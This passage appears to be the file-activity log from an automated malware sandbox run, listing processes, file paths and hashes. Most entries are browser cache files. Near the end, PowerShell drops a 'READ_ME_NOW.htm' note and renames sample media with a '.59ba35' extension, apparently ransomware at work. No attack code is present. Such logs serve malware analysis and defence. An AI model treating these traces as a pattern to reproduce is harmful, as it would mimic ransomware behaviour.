SHA256: 7af646045b6bff349a234ef8b6e7e917be567b77ae4055b4f4004a2d2d983a84
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\AZLSHWRC.txt
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\FT0V8TTY.txt
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\5GQCNV6P.txt
text
MD5: 9418f2a3230a774e95ba3d7b38f612d1
SHA256: fc6dd263b576ac7bd3b859cb1f1913d98d19fcf44a8a2302e57515efe31efdb6
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\6323ce42[1].js
text
MD5: 5f232d3ca185bfd98a0dea4e7d3f91cf
SHA256: 90d9f55534b9a587434559ba721439a24a790fe95a276210bf4590586ce5f075
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\c9969752[1].js
text
MD5: fd88c51edb7fcfe4f8d0aa2763cebe4a
SHA256: 51f58a23f7723b6cbd51b994cb784fbc2a4ab58442adaeda6c778f648073b699
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\6fb5e8ee[1].js
text
MD5: 270d1e6437f036799637f0e1dfbdcab5
SHA256: 783ac9fa4590eb0f713a5bcb1e402a1cb0ee32bb06b3c7558043d9459f47956e
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\U53OU6NP.txt
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\213da7d0[1].js
text
MD5: 3a2cc2685d307de67311ce612680efb7
SHA256: 9fdcc61341cbf83c8049d937a4b73b281d9aa6e24e418422ddd5bbb5aac5f236
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\e177b199[1].js
text
MD5: d6aed4b71913ff9b3192776d9bdbf0de
SHA256: ccdcef65bef50eb4f243ceb953aecac98fc6c43e2f9157ee7147d4ad612949b2
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\imagestore\toi5kkc\imagestore.dat
binary
MD5: 3816b3cd46c0d575f42b94de0d09ea8e
SHA256: 25b9140fcc8456c625b44d6355f370451f3979f53f4f28fcc740a490bc7c9369
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\11223621[1].js
text
MD5: 7e590d7d5dfddc5664c5ff4c5c275b19
SHA256: ab8c693bdde0ed12abe6a6d06535fcb583098262421675b3a9e27a51e481e355
2996
NOTEPAD.EXE
C:\Users\admin\Desktop\New Text Document.txt
text
MD5: 19bac4ea6f2654bb88845f8579a8b5cb
SHA256: 2882291a2efe8fc6f9e74bea2ec6565f27d9144de339b21056559a045c66155a
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\71b450b0[1].js
text
MD5: 52aa469570e7f09f519e54bf2e359b2f
SHA256: 30987f9f364b9657f3dee75e6365079b30ea3a166c5806d2aa065ee9a451cd49
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\a9b12688[1].js
text
MD5: 84fd3fc97faafcf8fcca752ecbff270e
SHA256: c996e21f2e6a6aeb85d1bd1b865879f9bc57ba397860abd5bcf883ee7da24936
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\37f3511b[1].js
text
MD5: 00056a3846a478dac418451ed533c110
SHA256: c4a2dc0ea6f2415e8fc1d1ab417fdce1e79fca658342c6371018353d152aab61
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\e70a8ff8[1].js
text
MD5: e80a46103fcfba9dd72657e862352a90
SHA256: 10ab253ef6afbf0cd7d39cbcb7eb77be7a75166b4f7eb6dc9e80e7e3ad0f2a35
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\f1d86b5a[1].js
text
MD5: a5363c37b617d36dfd6d25bfb89ca56b
SHA256: 8b4d85985e62c264c03c88b31e68dbabdcc9bd42f40032a43800902261ff373f
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\bing_p_rr_teal_min[1].ico
image
MD5: 0eebe3c8d9b72f7730a537ef6289b198
SHA256: dfcee10a1ff54a6ed839f7d266e614324b6509982d316f2e39285b882b5b9b27
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\40e1b425[1].js
text
MD5: 8aa44a43984d65ffc6df173e6e7b5aa7
SHA256: 6b7edfbfcd5f21a9db2a481d0fc00059dc4125a57b835f6987953f065b6b7bdb
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\f8c6dd44[1].js
text
MD5: 0fd0568e7b5068e209ac15210ae56ff2
SHA256: b87a66df064550755c00f605c7463007675490e64346a26dd60246d00e8a09de
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\3baa9af7[1].js
text
MD5: d5805f38ef0c0caef75335c76b3ab956
SHA256: aa8d1ba07437497f4a5867f87c78634c0eb19ee493dc6960c055452671997ae8
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\th[2].jpg
image
MD5: b890e982aa6e3690dc90c70d1bfdcdff
SHA256: f8a55a6aedf1aca6dde8e734447664135012984c52df3d36d4c5fdd452c00d3f
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\f45ec0a8[1].js
text
MD5: 1f34bb0187cecca9b1d21d43f8797773
SHA256: a81f7697c43ba6e754a416635f031f4858a8b176b6f83e336c1af2158dc8eb36
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\th[1].jpg
image
MD5: 229f801a3f89127cc301a19a59eb85ce
SHA256: 81d9c2504e7320f98b47e4edeb602f471be5a489bce57d9957263cf196b72c47
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\bd0f3e38[1].js
text
MD5: 1bc5728f7b7b84278e2b867263f2d3a0
SHA256: 8f605b4d887b6c5b2ef3668cb26a120fa166f00204947f9d84ca2b455ddd1d97
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\search[1].htm
html
MD5: 50eca62215553165017a9f46d6a92373
SHA256: 9bd0d6dbf17448aed0822b7baff1b6b3582e67898f08a8d39b1e4632e346aafe
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\imagestore\toi5kkc\imagestore.dat
binary
MD5: d96f8ad5c11da1e8ebb7537c8bf47b21
SHA256: 308ce44785cca871216bee7b83c8d46fb74978ee27e19eb6990cdfad780e0b9b
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\19b40d8c[1].js
text
MD5: 1f66989591ba2941ad580fc977fe2b70
SHA256: 32db3c853f4e673d42654bf6d27857a32b56e1cccf4b80b31a426cc151b9af63
2172
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\SharedSpriteDesktop_2x_090619[1].png
image
MD5: 24d31d90fafe1a921d1bda84da894642
SHA256: 47a9ff55f2401a1ac3f5eeff473ca16e3cd0d30f81f9249e9e6b02ac7f6b1f1b
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[1].ico
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\favicon[1].ico
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\NZ40RJN2.txt
text
MD5: b5b8f9b9d9733723f81f9d612dce3440
SHA256: 2fd4cde3e0683a67432f632a664646c6d33282a14e9f3d4abfa142116c054bc8
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\AIGPIIZS.txt
text
MD5: 45d3c84467b1585bba2e945ea07720ce
SHA256: 31577b5d9bd4d659ea878672e9cccc738abc54f6a0dde9c21cccfa2986eb77ce
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\KBU4MRY2.txt
text
MD5: c09191d0e57a2bbbe407ce9626c43a02
SHA256: b3db10a9b0e6c28cea0898fb77d811404f119fdf8f7b430bd72fe3a63948d3cf
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\qsml[1].htm
xml
MD5: febc16d86e7140f5e6bcc0bd55de6148
SHA256: b01918e1469416336258a129a3a5e8c51b3f1630a75fa169f76f3a80f31dd1c8
2940
WinRAR.exe
C:\Users\admin\Desktop\ramst007.rar
––
MD5:  ––
SHA256:  ––
2096
vlc.exe
C:\Users\admin\AppData\Roaming\vlc\vlcrc
text
MD5: fb9b36ccdf9f0e31539438938f75d197
SHA256: dfde1f8fb276e72fdcd797ec620832509fc5c5834fa6ea1e683a6f24d9965558
2096
vlc.exe
C:\Users\admin\AppData\Roaming\vlc\vlcrc.2096
––
MD5:  ––
SHA256:  ––
2064
powershell.exe
C:\Users\admin\AppData\Local\Temp\quanto98.tmp
text
MD5: 61aa7f508468e2fceff697cb36b18fe0
SHA256: 1cde5d0d308988d690be511d3a3f888243224aa1507c0122e1925194af41802c
2064
powershell.exe
C:\Users\Public\Videos\Sample Videos\READ_ME_NOW.htm
html
MD5: d720dd11db2c26bb451f53db4391958a
SHA256: 351797ec8c2e5efdbab6887c111fd53363d2e8ce0f568cb51f898118f73db23a
2064
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.59ba35
––
MD5:  ––
SHA256:  ––
2064
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––
2064
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.59ba35
binary
MD5: 2e7af2473f7740111f752ab06b00cda3
SHA256: c00db68a744a1c7919c874179197ffa8cf62f27ed5c915e27c7c14899aba3a53
2064
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
binary
MD5: 2e7af2473f7740111f752ab06b00cda3
SHA256: c00db68a744a1c7919c874179197ffa8cf62f27ed5c915e27c7c14899aba3a53
2064
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.59ba35
binary
MD5: 6e661895125d34b6a71958671e8055c0
SHA256: 6f2e707a89066a903c6ec62d8efc3052d087697dc7d3767962590ded9a8447da
2064
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA25